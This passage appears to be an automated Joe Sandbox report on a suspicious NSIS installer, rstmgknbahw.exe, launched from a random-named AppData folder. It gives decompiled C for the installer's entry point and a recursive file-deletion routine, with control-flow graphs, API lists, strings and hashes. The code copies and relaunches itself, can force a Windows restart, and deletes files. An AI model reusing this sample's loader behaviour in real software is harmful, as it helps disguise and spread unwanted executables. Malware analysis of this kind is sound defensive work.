3073->3066 3073->3069 3074->3073 3077 4015f2 GetFileAttributesA 3074->3077 3079 40215b 3075->3079 3077->3073 3078 401621 SetCurrentDirectoryA 3078->3079 3081 405626 3080->3081 3085 405632 3080->3085 3082 40562d CharNextA 3081->3082 3081->3085 3083 40564f 3082->3083 3083->3073 3084 4055a3 CharNextA 3084->3085 3085->3083 3085->3084 3086->3078 3087 401734 3088 4029e8 18 API calls 3087->3088 3089 40173b 3088->3089 3090 401761 3089->3090 3091 401759 3089->3091 3142 405a85 lstrcpynA 3090->3142 3141 405a85 lstrcpynA 3091->3141 3094 40175f 3098 405ce3 5 API calls 3094->3098 3095 40176c 3143 405578 lstrlenA CharPrevA 3095->3143 3118 40177e 3098->3118 3102 401795 CompareFileTime 3102->3118 3103 401859 3105 404e23 25 API calls 3103->3105 3104 401830 3107 404e23 25 API calls 3104->3107 3113 401845 3104->3113 3106 401863 3105->3106 3126 402f01 3106->3126 3107->3113 3110 40188a SetFileTime 3112 40189c FindCloseChangeNotification 3110->3112 3111 405aa7 18 API calls 3111->3118 3112->3113 3114 4018ad 3112->3114 3116 4018b2 3114->3116 3117 4018c5 3114->3117 3115 405a85 lstrcpynA 3115->3118 3119 405aa7 18 API calls 3116->3119 3120 405aa7 18 API calls 3117->3120 3118->3102 3118->3103 3118->3104 3118->3111 3118->3115 3125 40575c GetFileAttributesA CreateFileA 3118->3125 3146 405d7c FindFirstFileA 3118->3146 3149 40573d GetFileAttributesA 3118->3149 3152 405346 3118->3152 3122 4018ba lstrcatA 3119->3122 3123 4018cd 3120->3123 3122->3123 3124 405346 MessageBoxIndirectA 3123->3124 3124->3113 3125->3118 3127 402f12 SetFilePointer 3126->3127 3128 402f2e 3126->3128 3127->3128 3156 40302c GetTickCount 3128->3156 3131 402f3f ReadFile 3132 402f5f 3131->3132 3137 401876 3131->3137 3133 40302c 42 API calls 3132->3133 3132->3137 3134 402f76 3133->3134 3135 402ff1 ReadFile 3134->3135 3134->3137 3140 402f86 3134->3140 3135->3137 3137->3110 3137->3112 3138 402fa1 ReadFile 3138->3137 3138->3140 3139 402fba WriteFile 3139->3137 3139->3140 3140->3137 3140->3138 3140->3139 3141->3094 3142->3095 3144 405592 lstrcatA 3143->3144 3145 401772 lstrcatA 3143->3145 3144->3145 3145->3094 3147 405d92 FindClose 3146->3147 3148 405d9d 3146->3148 3147->3148 3148->3118 3150 405759 3149->3150 3151 40574c SetFileAttributesA 3149->3151 3150->3118 3151->3150 3153 40535b 3152->3153 3154 4053a7 3153->3154 3155 40536f MessageBoxIndirectA 3153->3155 3154->3118 3155->3154 3157 403196 3156->3157 3158 40305b 3156->3158 3159 402bc5 32 API calls 3157->3159 3169 4031da SetFilePointer 3158->3169 3165 402f37 3159->3165 3161 403066 SetFilePointer 3166 40308b 3161->3166 3165->3131 3165->3137 3166->3165 3167 403120 WriteFile 3166->3167 3168 403177 SetFilePointer 3166->3168 3170 4031a8 ReadFile 3166->3170 3172 405e9d 3166->3172 3179 402bc5 3166->3179 3167->3165 3167->3166 3168->3157 3169->3161 3171 4031c9 3170->3171 3171->3166 3173 405ec2 3172->3173 3174 405eca 3172->3174 3173->3166 3174->3173 3175 405f51 GlobalFree 3174->3175 3176 405f5a GlobalAlloc 3174->3176 3177 405fd1 GlobalAlloc 3174->3177 3178 405fc8 GlobalFree 3174->3178 3175->3176 3176->3173 3176->3174 3177->3173 3177->3174 3178->3177 3180 402bd3 3179->3180 3181 402beb 3179->3181 3182 402be3 3180->3182 3183 402bdc DestroyWindow 3180->3183 3184 402bf3 3181->3184 3185 402bfb GetTickCount 3181->3185 3182->3166 3183->3182 3194 405ddc 3184->3194 3185->3182 3187 402c09 3185->3187 3188 402c11 3187->3188 3189 402c3e CreateDialogParamA 3187->3189 3188->3182 3198 402ba9 3188->3198 3189->3182 3191 402c1f wsprintfA 3192 404e23 25 API calls 3191->3192 3193 402c3c 3192->3193 3193->3182 3195 405df9 PeekMessageA 3194->3195 3196 405e09 3195->3196 3197 405def DispatchMessageA 3195->3197 3196->3182 3197->3195 3199 402bb8 3198->3199 3200 402bba MulDiv 3198->3200 3199->3200 3200->3191 4110 401634 4111 4029e8 18 API calls 4110->4111 4112 40163a 4111->4112 4113 405d7c 2 API calls 4112->4113 4114 401640 4113->4114 4115 401934 4116 4029cb 18 API calls 4115->4116 4117 40193b 4116->4117 4118 4029cb 18 API calls 4117->4118 4119 401945 4118->4119 4120 4029e8 18 API calls 4119->4120 4121 40194e 4120->4121 4122 401961 lstrlenA 4121->4122 4124 40199c 4121->4124 4123 40196b 4122->4123 4123->4124 4128 405a85 lstrcpynA 4123->4128 4126 401985 4126->4124 4127 401992 lstrlenA 4126->4127 4127->4124 4128->4126 4398 4019b5 4399 4029e8 18 API calls 4398->4399 4400 4019bc 4399->4400 4401 4029e8 18 API calls 4400->4401 4402 4019c5 4401->4402 4403 4019cc lstrcmpiA 4402->4403 4404 4019de lstrcmpA 4402->4404 4405 4019d2 4403->4405 4404->4405 4406 4014b7 4407 4014bd 4406->4407 4408 401389 2 API calls 4407->4408 4409 4014c5 4408->4409 4410 4025be 4411 4025c5 4410->4411 4413 40282a 4410->4413 4412 4029cb 18 API calls 4411->4412 4414 4025d0 4412->4414 4415 4025d7 SetFilePointer 4414->4415 4415->4413 4416 4025e7 4415->4416 4418 4059e3 wsprintfA 4416->4418 4418->4413

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 26 403393-4033aa DeleteFileA call 402c5b 16->26 27 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->27 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 36 40333f 20->36 24 403311-403317 21->24 25 403303-40330c 21->25 31 403327-40332e 24->31 32 403319-403322 24->32 25->24 29 40330e 25->29 39 403411-403420 call 4035a6 OleUninitialize 26->39 40 4033ac-4033b2 26->40 27->26 27->39 29->24 31->20 34 403348-403354 call 405a85 31->34 32->31 38 403324 32->38 34->16 36->11 38->31 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->39 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 81 403532-403534 52->81 82 40357a-403585 ExitWindowsEx 52->82 57 403598 53->57 58 40359c-4035a0 ExitProcess 53->58 59 4033cc-4033d6 54->59 60 4033bf-4033c5 54->60 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->54 64->39 74 4033e7-4033fd call 405a85 * 2 64->74 65->39 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 80 403499-4034b5 call 405aa7 DeleteFileA 71->80 72->71 74->42 92 4034f6-4034fd 80->92 93 4034b7-4034c7 CopyFileA 80->93 81->82 86 403536-403538 81->86 82->53 85 403587-403589 call 40140b 82->85 85->53 86->82 91 40353a-40354c GetCurrentProcess 86->91 91->82 98 40354e-403570 91->98 92->80 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->39 98->82 107->92
                          C-Code - Quality: 83%
                          			_entry_() {
                          				struct _SHFILEINFOA _v360;
                          				struct _SECURITY_ATTRIBUTES* _v376;
                          				char _v380;
                          				CHAR* _v384;
                          				char _v396;
                          				int _v400;
                          				int _v404;
                          				CHAR* _v408;
                          				intOrPtr _v412;
                          				int _v416;
                          				intOrPtr _v420;
                          				struct _SECURITY_ATTRIBUTES* _v424;
                          				void* _v432;
                          				int _t34;
                          				CHAR* _t39;
                          				char* _t42;
                          				signed int _t44;
                          				void* _t48;
                          				intOrPtr _t50;
                          				signed int _t52;
                          				signed int _t55;
                          				int _t56;
                          				signed int _t60;
                          				intOrPtr _t71;
                          				intOrPtr _t77;
                          				void* _t79;
                          				void* _t89;
                          				void* _t91;
                          				char* _t96;
                          				signed int _t97;
                          				void* _t98;
                          				signed int _t99;
                          				signed int _t100;
                          				signed int _t103;
                          				CHAR* _t105;
                          				signed int _t106;
                          				intOrPtr _t113;
                          				char _t120;
                          
                          				_v376 = 0;
                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                          				_t99 = 0;
                          				_v380 = 0x20;
                          				__imp__#17();
                          				_t34 = SetErrorMode(0x8001); // executed
                          				__imp__OleInitialize(0); // executed
                          				 *0x423f58 = _t34;
                          				 *0x423ea4 = E00405DA3(8);
                          				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                          				E00405A85("heifsmlbdxlebvytfzg Setup", "NSIS Error");
                          				_t39 = GetCommandLineA();
                          				_t96 = "\"C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe\" ";
                          				E00405A85(_t96, _t39);
                          				 *0x423ea0 = GetModuleHandleA(0);
                          				_t42 = _t96;
                          				if("\"C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe\" " == 0x22) {
                          					_v404 = 0x22;
                          					_t42 =  &M00429001;
                          				}
                          				_t44 = CharNextA(E004055A3(_t42, _v404));
                          				_v404 = _t44;
                          				while(1) {
                          					_t91 =  *_t44;
                          					_t109 = _t91;
                          					if(_t91 == 0) {
                          						break;
                          					}
                          					__eflags = _t91 - 0x20;
                          					if(_t91 != 0x20) {
                          						L5:
                          						__eflags =  *_t44 - 0x22;
                          						_v404 = 0x20;
                          						if( *_t44 == 0x22) {
                          							_t44 = _t44 + 1;
                          							__eflags = _t44;
                          							_v404 = 0x22;
                          						}
                          						__eflags =  *_t44 - 0x2f;
                          						if( *_t44 != 0x2f) {
                          							L15:
                          							_t44 = E004055A3(_t44, _v404);
                          							__eflags =  *_t44 - 0x22;
                          							if(__eflags == 0) {
                          								_t44 = _t44 + 1;
                          								__eflags = _t44;
                          							}
                          							continue;
                          						} else {
                          							_t44 = _t44 + 1;
                          							__eflags =  *_t44 - 0x53;
                          							if( *_t44 == 0x53) {
                          								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                          									_t99 = _t99 | 0x00000002;
                          									__eflags = _t99;
                          								}
                          							}
                          							__eflags =  *_t44 - 0x4352434e;
                          							if( *_t44 == 0x4352434e) {
                          								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                          									_t99 = _t99 | 0x00000004;
                          									__eflags = _t99;
                          								}
                          							}
                          							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                          							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                          								 *((intOrPtr*)(_t44 - 2)) = 0;
                          								_t45 = _t44 + 2;
                          								__eflags = _t44 + 2;
                          								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
                          								L20:
                          								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                          								GetTempPathA(0x400, _t105);
                          								_t48 = E004031F1(_t109);
                          								_t110 = _t48;
                          								if(_t48 != 0) {
                          									L22:
                          									DeleteFileA("1033"); // executed
                          									_t50 = E00402C5B(_t111, _t99); // executed
                          									_v412 = _t50;
                          									if(_t50 != 0) {
                          										L32:
                          										E004035A6();
                          										__imp__OleUninitialize();
                          										if(_v408 == 0) {
                          											__eflags =  *0x423f34; // 0x0
                          											if(__eflags != 0) {
                          												_t106 = E00405DA3(3);
                          												_t100 = E00405DA3(4);
                          												_t55 = E00405DA3(5);
                          												__eflags = _t106;
                          												_t97 = _t55;
                          												if(_t106 != 0) {
                          													__eflags = _t100;
                          													if(_t100 != 0) {
                          														__eflags = _t97;
                          														if(_t97 != 0) {
                          															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                          															__eflags = _t60;
                          															if(_t60 != 0) {
                          																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                          																_v416 = 1;
                          																_v404 = 2;
                          																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                          															}
                          														}
                          													}
                          												}
                          												_t56 = ExitWindowsEx(2, 0);
                          												__eflags = _t56;
                          												if(_t56 == 0) {
                          													E0040140B(9);
                          												}
                          											}
                          											_t52 =  *0x423f4c; // 0xffffffff
                          											__eflags = _t52 - 0xffffffff;
                          											if(_t52 != 0xffffffff) {
                          												_v400 = _t52;
                          											}
                          											ExitProcess(_v400);
                          										}
                          										E00405346(_v408, 0x200010);
                          										ExitProcess(2);
                          									}
                          									_t113 =  *0x423ebc; // 0x0
                          									if(_t113 == 0) {
                          										L31:
                          										 *0x423f4c =  *0x423f4c | 0xffffffff;
                          										_v400 = E004035E3();
                          										goto L32;
                          									}
                          									_t103 = E004055A3(_t96, 0);
                          									while(_t103 >= _t96) {
                          										__eflags =  *_t103 - 0x3d3f5f20;
                          										if(__eflags == 0) {
                          											break;
                          										}
                          										_t103 = _t103 - 1;
                          										__eflags = _t103;
                          									}
                          									_t115 = _t103 - _t96;
                          									_v408 = "Error launching installer";
                          									if(_t103 < _t96) {
                          										lstrcatA(_t105, "~nsu.tmp");
                          										_t101 = "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy";
                          										if(lstrcmpiA(_t105, "C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy") == 0) {
                          											goto L32;
                          										}
                          										CreateDirectoryA(_t105, 0);
                          										SetCurrentDirectoryA(_t105);
                          										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                          										if(_t120 == 0) {
                          											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
                          										}
                          										E00405A85(0x424000, _v396);
                          										 *0x424400 = 0x41;
                          										_t98 = 0x1a;
                          										do {
                          											_t71 =  *0x423eb0; // 0x753e70
                          											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
                          											DeleteFileA(0x41f050);
                          											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\AppData\\Roaming\\sspgadrjncoy\\rstmgknbahw.exe", 0x41f050, 1) != 0) {
                          												_push(0);
                          												_push(0x41f050);
                          												E004057D3();
                          												_t77 =  *0x423eb0; // 0x753e70
                          												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
                          												_t79 = E004052E5(0x41f050);
                          												if(_t79 != 0) {
                          													CloseHandle(_t79);
                          													_v416 = 0;
                          												}
                          											}
                          											 *0x424400 =  *0x424400 + 1;
                          											_t98 = _t98 - 1;
                          										} while (_t98 != 0);
                          										_push(0);
                          										_push(_t105);
                          										E004057D3();
                          										goto L32;
                          									}
                          									 *_t103 = 0;
                          									_t104 = _t103 + 4;
                          									if(E00405659(_t115, _t103 + 4) == 0) {
                          										goto L32;
                          									}
                          									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                          									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                          									_v424 = 0;
                          									goto L31;
                          								}
                          								GetWindowsDirectoryA(_t105, 0x3fb);
                          								lstrcatA(_t105, "\\Temp");
                          								_t89 = E004031F1(_t110);
                          								_t111 = _t89;
                          								if(_t89 == 0) {
                          									goto L32;
                          								}
                          								goto L22;
                          							}
                          							goto L15;
                          						}
                          					} else {
                          						goto L4;
                          					}
                          					do {
                          						L4:
                          						_t44 = _t44 + 1;
                          						__eflags =  *_t44 - 0x20;
                          					} while ( *_t44 == 0x20);
                          					goto L5;
                          				}
                          				goto L20;
                          			}









































                          0x00403231
                          0x00403235
                          0x0040323d
                          0x0040323f
                          0x00403244
                          0x0040324f
                          0x00403256
                          0x0040325e
                          0x00403268
                          0x0040327e
                          0x0040328e
                          0x00403293
                          0x00403299
                          0x004032a0
                          0x004032b3
                          0x004032b8
                          0x004032ba
                          0x004032bc
                          0x004032c1
                          0x004032c1
                          0x004032d1
                          0x004032d7
                          0x00403340
                          0x00403340
                          0x00403342
                          0x00403344
                          0x00000000
                          0x00000000
                          0x004032dd
                          0x004032e0
                          0x004032e8
                          0x004032e8
                          0x004032eb
                          0x004032f0
                          0x004032f2
                          0x004032f2
                          0x004032f3
                          0x004032f3
                          0x004032f8
                          0x004032fb
                          0x00403330
                          0x00403335
                          0x0040333a
                          0x0040333d
                          0x0040333f
                          0x0040333f
                          0x0040333f
                          0x00000000
                          0x004032fd
                          0x004032fd
                          0x004032fe
                          0x00403301
                          0x00403309
                          0x0040330c
                          0x0040330e
                          0x0040330e
                          0x0040330e
                          0x0040330c
                          0x00403311
                          0x00403317
                          0x0040331f
                          0x00403322
                          0x00403324
                          0x00403324
                          0x00403324
                          0x00403322
                          0x00403327
                          0x0040332e
                          0x00403348
                          0x0040334b
                          0x0040334b
                          0x00403354
                          0x00403359
                          0x00403359
                          0x00403364
                          0x0040336a
                          0x0040336f
                          0x00403371
                          0x00403393
                          0x00403398
                          0x0040339f
                          0x004033a6
                          0x004033aa
                          0x00403411
                          0x00403411
                          0x00403416
                          0x00403420
                          0x0040350b
                          0x00403511
                          0x0040351c
                          0x00403525
                          0x00403527
                          0x0040352c
                          0x0040352e
                          0x00403530
                          0x00403532
                          0x00403534
                          0x00403536
                          0x00403538
                          0x00403548
                          0x0040354a
                          0x0040354c
                          0x00403559
                          0x00403568
                          0x00403570
                          0x00403578
                          0x00403578
                          0x0040354c
                          0x00403538
                          0x00403534
                          0x0040357d
                          0x00403583
                          0x00403585
                          0x00403589
                          0x00403589
                          0x00403585
                          0x0040358e
                          0x00403593
                          0x00403596
                          0x00403598
                          0x00403598
                          0x004035a0
                          0x004035a0
                          0x0040342f
                          0x00403436
                          0x00403436
                          0x004033ac
                          0x004033b2
                          0x00403401
                          0x00403401
                          0x0040340d
                          0x00000000
                          0x0040340d
                          0x004033bb
                          0x004033c8
                          0x004033bf
                          0x004033c5
                          0x00000000
                          0x00000000
                          0x004033c7
                          0x004033c7
                          0x004033c7
                          0x004033cc
                          0x004033ce
                          0x004033d6
                          0x00403442
                          0x00403447
                          0x00403456
                          0x00000000
                          0x00000000
                          0x0040345a
                          0x00403461
                          0x00403467
                          0x0040346d
                          0x00403475
                          0x00403475
                          0x00403483
                          0x0040348a
                          0x00403493
                          0x00403499
                          0x00403499
                          0x004034a5
                          0x004034ab
                          0x004034b5
                          0x004034c9
                          0x004034ca
                          0x004034cb
                          0x004034d0
                          0x004034dc
                          0x004034e2
                          0x004034e9
                          0x004034ec
                          0x004034f2
                          0x004034f2
                          0x004034e9
                          0x004034f6
                          0x004034fc
                          0x004034fc
                          0x004034ff
                          0x00403500
                          0x00403501
                          0x00000000
                          0x00403501
                          0x004033d8
                          0x004033da
                          0x004033e5
                          0x00000000
                          0x00000000
                          0x004033ed
                          0x004033f8
                          0x004033fd
                          0x00000000
                          0x004033fd
                          0x00403379
                          0x00403385
                          0x0040338a
                          0x0040338f
                          0x00403391
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403391
                          0x00000000
                          0x0040332e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004032e2
                          0x004032e2
                          0x004032e2
                          0x004032e3
                          0x004032e3
                          0x00000000
                          0x004032e2
                          0x00000000

                          APIs
                          • #17.COMCTL32 ref: 00403244
                          • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                          • OleInitialize.OLE32(00000000), ref: 00403256
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92
                          • GetCommandLineA.KERNEL32(heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00403293
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000), ref: 004032A6
                          • CharNextA.USER32(00000000,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000020), ref: 004032D1
                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                          • DeleteFileA.KERNELBASE(1033), ref: 00403398
                          • OleUninitialize.OLE32(00000000), ref: 00403416
                          • ExitProcess.KERNEL32 ref: 00403436
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,00000000), ref: 00403442
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,00000000,00000000), ref: 0040344E
                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                          • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                          • CopyFileA.KERNEL32 ref: 004034BF
                          • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                          • ExitProcess.KERNEL32 ref: 004035A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\sspgadrjncoy$C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$heifsmlbdxlebvytfzg Setup$p>u$~nsu.tmp
                          • API String ID: 2278157092-1813836157
                          • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                          • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                          • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                          • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 247 4053aa-4053c5 call 405659 250 4053c7-4053d9 DeleteFileA 247->250 251 4053de-4053e8 247->251 252 405572-405575 250->252 253 4053ea-4053ec 251->253 254 4053fc-40540a call 405a85 251->254 255 4053f2-4053f6 253->255 256 40551d-405523 253->256 262 405419-40541a call 4055bf 254->262 263 40540c-405417 lstrcatA 254->263 255->254 255->256 256->252 258 405525-405528 256->258 260 405532-40553a call 405d7c 258->260 261 40552a-405530 258->261 260->252 271 40553c-405551 call 405578 call 40573d RemoveDirectoryA 260->271 261->252 266 40541f-405422 262->266 263->266 267 405424-40542b 266->267 268 40542d-405433 lstrcatA 266->268 267->268 270 405438-405456 lstrlenA FindFirstFileA 267->270 268->270 272 405513-405517 270->272 273 40545c-405473 call 4055a3 270->273 283 405553-405557 271->283 284 40556a-40556d call 404e23 271->284 272->256 275 405519 272->275 280 405475-405479 273->280 281 40547e-405481 273->281 275->256 280->281 285 40547b 280->285 286 405483-405488 281->286 287 405494-4054a2 call 405a85 281->287 283->261 288 405559-405568 call 404e23 call 4057d3 283->288 284->252 285->281 290 4054f2-405504 FindNextFileA 286->290 291 40548a-40548c 286->291 297 4054a4-4054ac 287->297 298 4054b9-4054c8 call 40573d DeleteFileA 287->298 288->252 290->273 295 40550a-40550d FindClose 290->295 291->287 296 40548e-405492 291->296 295->272 296->287 296->290 297->290 300 4054ae-4054b7 call 4053aa 297->300 307 4054ea-4054ed call 404e23 298->307 308 4054ca-4054ce 298->308 300->290 307->290 310 4054d0-4054e0 call 404e23 call 4057d3 308->310 311 4054e2-4054e8 308->311 310->290 311->290
                          C-Code - Quality: 94%
                          			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				struct _WIN32_FIND_DATAA _v332;
                          				signed int _t37;
                          				char* _t49;
                          				signed int _t52;
                          				signed int _t55;
                          				signed int _t61;
                          				signed int _t63;
                          				void* _t65;
                          				signed int _t68;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				char* _t75;
                          
                          				_t72 = _a4;
                          				_t37 = E00405659(__eflags, _t72);
                          				_v12 = _t37;
                          				if((_a8 & 0x00000008) != 0) {
                          					_t63 = DeleteFileA(_t72); // executed
                          					asm("sbb eax, eax");
                          					_t65 =  ~_t63 + 1;
                          					 *0x423f28 =  *0x423f28 + _t65;
                          					return _t65;
                          				}
                          				_t68 = _a8 & 0x00000001;
                          				__eflags = _t68;
                          				_v8 = _t68;
                          				if(_t68 == 0) {
                          					L5:
                          					E00405A85(0x4214a0, _t72);
                          					__eflags = _t68;
                          					if(_t68 == 0) {
                          						E004055BF(_t72);
                          					} else {
                          						lstrcatA(0x4214a0, "\*.*");
                          					}
                          					__eflags =  *_t72;
                          					if( *_t72 != 0) {
                          						L10:
                          						lstrcatA(_t72, 0x40900c);
                          						L11:
                          						_t70 =  &(_t72[lstrlenA(_t72)]);
                          						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                          						__eflags = _t37 - 0xffffffff;
                          						_a4 = _t37;
                          						if(_t37 == 0xffffffff) {
                          							L29:
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								_t31 = _t70 - 1;
                          								 *_t31 =  *(_t70 - 1) & 0x00000000;
                          								__eflags =  *_t31;
                          							}
                          							goto L31;
                          						} else {
                          							goto L12;
                          						}
                          						do {
                          							L12:
                          							_t75 =  &(_v332.cFileName);
                          							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                          							__eflags =  *_t49;
                          							if( *_t49 != 0) {
                          								__eflags = _v332.cAlternateFileName;
                          								if(_v332.cAlternateFileName != 0) {
                          									_t75 =  &(_v332.cAlternateFileName);
                          								}
                          							}
                          							__eflags =  *_t75 - 0x2e;
                          							if( *_t75 != 0x2e) {
                          								L19:
                          								E00405A85(_t70, _t75);
                          								__eflags = _v332.dwFileAttributes & 0x00000010;
                          								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                          									E0040573D(_t72);
                          									_t52 = DeleteFileA(_t72);
                          									__eflags = _t52;
                          									if(_t52 != 0) {
                          										E00404E23(0xfffffff2, _t72);
                          									} else {
                          										__eflags = _a8 & 0x00000004;
                          										if((_a8 & 0x00000004) == 0) {
                          											 *0x423f28 =  *0x423f28 + 1;
                          										} else {
                          											E00404E23(0xfffffff1, _t72);
                          											_push(0);
                          											_push(_t72);
                          											E004057D3();
                          										}
                          									}
                          								} else {
                          									__eflags = (_a8 & 0x00000003) - 3;
                          									if(__eflags == 0) {
                          										E004053AA(_t70, __eflags, _t72, _a8);
                          									}
                          								}
                          								goto L27;
                          							}
                          							_t61 =  *((intOrPtr*)(_t75 + 1));
                          							__eflags = _t61;
                          							if(_t61 == 0) {
                          								goto L27;
                          							}
                          							__eflags = _t61 - 0x2e;
                          							if(_t61 != 0x2e) {
                          								goto L19;
                          							}
                          							__eflags =  *((char*)(_t75 + 2));
